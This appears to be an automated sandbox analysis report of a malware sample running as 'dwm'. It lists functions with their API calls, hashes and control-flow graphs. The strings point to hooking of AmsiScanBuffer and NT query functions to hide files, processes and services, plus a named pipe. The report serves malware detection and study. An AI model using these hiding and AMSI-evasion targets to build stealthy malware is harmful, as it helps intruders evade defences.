                                                        • Opcode ID: 7a5fee01b1213345a503af0682c6d2ffec643d6d1f98ca0352beea81c30d0a52
                                                        • Instruction ID: 6c1c517b8b39532bc1570f6a57eea27ecb378881f27f95461f418c508f3e16df
                                                        • Opcode Fuzzy Hash: 7a5fee01b1213345a503af0682c6d2ffec643d6d1f98ca0352beea81c30d0a52
                                                        • Instruction Fuzzy Hash: 71F03037618B0480DA34DB01E46574A77B0F3CC7D4F540111F98D47B69CB3AC298CB19
                                                        Function 000002BAAF211AC8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002BAAF211628: GetProcessHeap.KERNEL32 ref: 000002BAAF211633
                                                          • Part of subcall function 000002BAAF211628: HeapAlloc.KERNEL32 ref: 000002BAAF211642
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF2116B2
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF2116DF
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF2116F9
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF211719
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.KERNELBASE ref: 000002BAAF211734
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF211754
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF21176F
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF21178F
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF2117AA
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF2117CA
                                                        • SleepEx.KERNELBASE ref: 000002BAAF211AE3
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF2117E5
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF211805
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF211820
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF211840
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF21185B
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF21187B
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF211896
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.KERNELBASE ref: 000002BAAF2118A0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: 52656d555919b3258d329d4c78e2598348f5e3d4728d7a4abf1d47675c7589a9
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: 7F21FFB3201A0581FF6C9B66E97936973BDAB44BC0F0454329E09C7699EF36C459C23E

                                                        Non-executed Functions

                                                        Function 000002BAAF2181B0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: 2cdddfb24dcb9e58864d5c7fd66479fd0ae041404f743687f717a93430f7ff31
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: B7314F73205B8086EB649F60E8A47DD7374F784744F44452ADA4E87B98DF39CA4CC729
                                                        Function 000002BAAF21B62C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 9860fb8d6c2153c2bec71c75c1ad87854f6e26e8922285ef653b20fa1e212338
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: 94317E33214B8086EB64CF25E89479E73B0F788754F500126EA8D83BA8DF39C549CB55
                                                        Function 000002BAAF220018 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: 26e92c23cfc63e0f224c8de2eef51c3944d80d5177babec700e58e84c4514a43
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: 20E11273B14B808AE714CF64D4A82DD7BB1F3447C8F148216DE5A97B99EB39C41AC711
                                                        Function 000002BAAF1EB150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: 55b62b567fa26138a0f9498a4bc91ff7098edf7196ff50c9a47d77eb3b0ecbd2
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: 4151F26371079485EF18CFA2D8486AD3BB1FB58BD8F444526EF0987B89DB3AC041C321
                                                        Function 000002BAAF211D3C Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 000002BAAF211D47
                                                          • Part of subcall function 000002BAAF2120C0: GetModuleHandleA.KERNEL32(?,?,?,000002BAAF211D79), ref: 000002BAAF2120D8
                                                          • Part of subcall function 000002BAAF2120C0: GetProcAddress.KERNEL32(?,?,?,000002BAAF211D79), ref: 000002BAAF2120E9
                                                          • Part of subcall function 000002BAAF215F50: GetCurrentThreadId.KERNEL32 ref: 000002BAAF215F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: 21b25b163118572548bccb4b7d857d1436b4f136c2fe903d6f458356e84ab4c3
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: D04192B3111A4AA0FE0CEBA9E87A7D83335A714344F805453A409C75B5DF3A828EC77B
                                                        Function 000002BAAF2112BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: 4d986bfbe53463785bc2cce0d8d9cff0304497693efb45bc83489287b5bcd976
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: 3E513933200B8486EB28CF62E46C39AB7B5F788F98F048124DA4987768DF3DC459CB55
                                                        Function 000002BAAF1E6D30 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: d78dc888d663f9f8e096334c887be32059b8155763ef9f3c124063d80c251090
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: B081AF3361034186FA5CAB65D8493B97FF0AB55780F844127AB59C379ADB3BC842D732
                                                        Function 000002BAAF212FA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: 827ca727855c6dfb9561eb47bc0c1bff2908194ac9db9ba34932d71fc10b52df
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 8331C133A00A4096EB38CF22A82C35AB3F1F798B85F444124DE4D83624DF39C91AC759
                                                        Function 000002BAAF2130B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: 604fd7156905f951336c0376af5a9734d39e2e733c553a5a6a098d33176ff5bb
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 6131AD73610B4186FB28DF66A86C75A73B2F784F84F044125DE4A83724DF39C80AC719
                                                        Function 000002BAAF212C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 238librarystringloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 394 2baaf212c10-2baaf212c8d 396 2baaf212e8c-2baaf212eaf 394->396 397 2baaf212c93-2baaf212c99 394->397 397->396 398 2baaf212c9f-2baaf212ca2 397->398 398->396 399 2baaf212ca8-2baaf212cab 398->399 399->396 400 2baaf212cb1-2baaf212cc1 GetModuleHandleA 399->400 401 2baaf212cc3-2baaf212cd3 GetProcAddress 400->401 402 2baaf212cd5 400->402 403 2baaf212cd8-2baaf212cf6 401->403 402->403 403->396 405 2baaf212cfc-2baaf212d1b StrCmpNIW 403->405 405->396 406 2baaf212d21-2baaf212d25 405->406 406->396 407 2baaf212d2b-2baaf212d35 406->407 407->396 408 2baaf212d3b-2baaf212d3f 407->408 408->396 409 2baaf212d45 408->409 410 2baaf212d4c-2baaf212d5f 409->410 411 2baaf212d6f 410->411 412 2baaf212d61-2baaf212d6d 410->412 413 2baaf212d72-2baaf212d76 411->413 412->413 414 2baaf212d86 413->414 415 2baaf212d78-2baaf212d84 413->415 416 2baaf212d89-2baaf212d93 414->416 415->416 417 2baaf212eb0-2baaf212eb4 416->417 418 2baaf212d99-2baaf212d9c 416->418 419 2baaf212e6e-2baaf212e81 417->419 420 2baaf212eb6-2baaf212eb9 417->420 421 2baaf212d9e-2baaf212db2 call 2baaf211934 418->421 422 2baaf212db5-2baaf212db8 418->422 419->410 425 2baaf212e87 419->425 426 2baaf212ebb-2baaf212ece call 2baaf211934 420->426 427 2baaf212ed1-2baaf212ed4 420->427 421->422 423 2baaf212dba-2baaf212dc5 422->423 424 2baaf212e1f-2baaf212e22 422->424 429 2baaf212dea-2baaf212ded 423->429 430 2baaf212dc7-2baaf212dd4 423->430 431 2baaf212e34-2baaf212e41 lstrlenW 424->431 432 2baaf212e24 424->432 425->396 426->427 435 2baaf212f02-2baaf212f05 427->435 436 2baaf212ed6-2baaf212ee1 427->436 429->424 440 2baaf212def-2baaf212dfa 429->440 438 2baaf212dd8-2baaf212dde 430->438 443 2baaf212e43-2baaf212e4f call 2baaf211bf4 431->443 444 2baaf212e55-2baaf212e61 call 2baaf213c70 431->444 441 2baaf212e27-2baaf212e2e call 2baaf211bbc 432->441 435->431 439 2baaf212f0b-2baaf212f0d 435->439 436->435 437 2baaf212ee3-2baaf212ef0 436->437 446 2baaf212ef4-2baaf212efa 437->446 447 2baaf212de4-2baaf212de8 438->447 448 2baaf212f19-2baaf212f24 438->448 439->441 440->424 450 2baaf212dfc-2baaf212e09 440->450 441->431 441->448 443->444 459 2baaf212f12 443->459 444->459 460 2baaf212e67 444->460 446->448 453 2baaf212efc-2baaf212f00 446->453 447->429 447->438 455 2baaf212f92-2baaf212f99 448->455 456 2baaf212f26-2baaf212f2a 448->456 457 2baaf212e0d-2baaf212e13 450->457 453->435 453->446 455->419 461 2baaf212f2c-2baaf212f30 456->461 462 2baaf212f32-2baaf212f47 call 2baaf2189d0 456->462 457->448 463 2baaf212e19-2baaf212e1d 457->463 459->448 460->419 461->462 464 2baaf212f4c-2baaf212f4f 461->464 462->464 463->424 463->457 466 2baaf212f6f-2baaf212f72 464->466 467 2baaf212f51-2baaf212f6a call 2baaf2189d0 464->467 466->455 469 2baaf212f74-2baaf212f8d call 2baaf2189d0 466->469 467->466 469->455
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: 769e84a2c9f4a1d4c88bca80880055d21e2f1b8f387a042d7e45c9afeb02fba2
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 79A1D037201A9082EF6C8F25D4283AA73B5F754B84F14402AEE4993BD8DF36DC49C369
                                                        Function 000002BAAF21104C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 471 2baaf21104c-2baaf2110b9 RegQueryInfoKeyW 472 2baaf2110bf-2baaf2110c9 471->472 473 2baaf2111b7-2baaf2111d2 471->473 472->473 474 2baaf2110cf-2baaf21111f RegEnumValueW 472->474 475 2baaf211125-2baaf21112a 474->475 476 2baaf2111a7-2baaf2111b1 474->476 475->476 477 2baaf21112c-2baaf211137 475->477 476->473 476->474 478 2baaf211149-2baaf21114e 477->478 479 2baaf211139 477->479 481 2baaf21119d-2baaf2111a5 478->481 482 2baaf211150-2baaf21119b GetProcessHeap HeapAlloc GetProcessHeap HeapFree 478->482 480 2baaf21113d-2baaf211141 479->480 480->476 483 2baaf211143-2baaf211147 480->483 481->476 482->481 483->478 483->480
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: 17b7c67a4659a1ee2ea207a4b9d2a1f744c0001ed1848a17b59a3d6ea6580b49
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 7A41A133210BC0C6EB64CF62E45839EB7B5F388B88F448129DA8947B58DF39C949CB15
                                                        Function 000002BAAF212344 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 5569d143b3704276fc45ae845523955183690dd4a9a822bfaed84a14c2286337
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: C5115E32618B4083F7248B21F46875A7770F389BE4F544315EA5A46BA8CF3DC54DCB25
                                                        Function 000002BAAF217930 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: caeccb32e2cdfb1f0617440fb68d376f8d3dfeb23e3626373eeddf6c39776d90
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
